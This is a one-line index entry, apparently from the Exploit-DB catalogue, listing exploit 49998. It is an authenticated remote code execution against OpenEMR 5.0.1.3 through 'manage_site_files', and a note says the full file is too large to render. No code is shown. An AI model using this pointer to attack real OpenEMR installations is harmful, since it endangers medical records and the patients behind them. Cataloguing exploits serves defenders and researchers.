49998,exploits/php/webapps/49998.py,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)",2021-06-14,"Ron Jost",webapps,php,

Can't render this file because it is too large.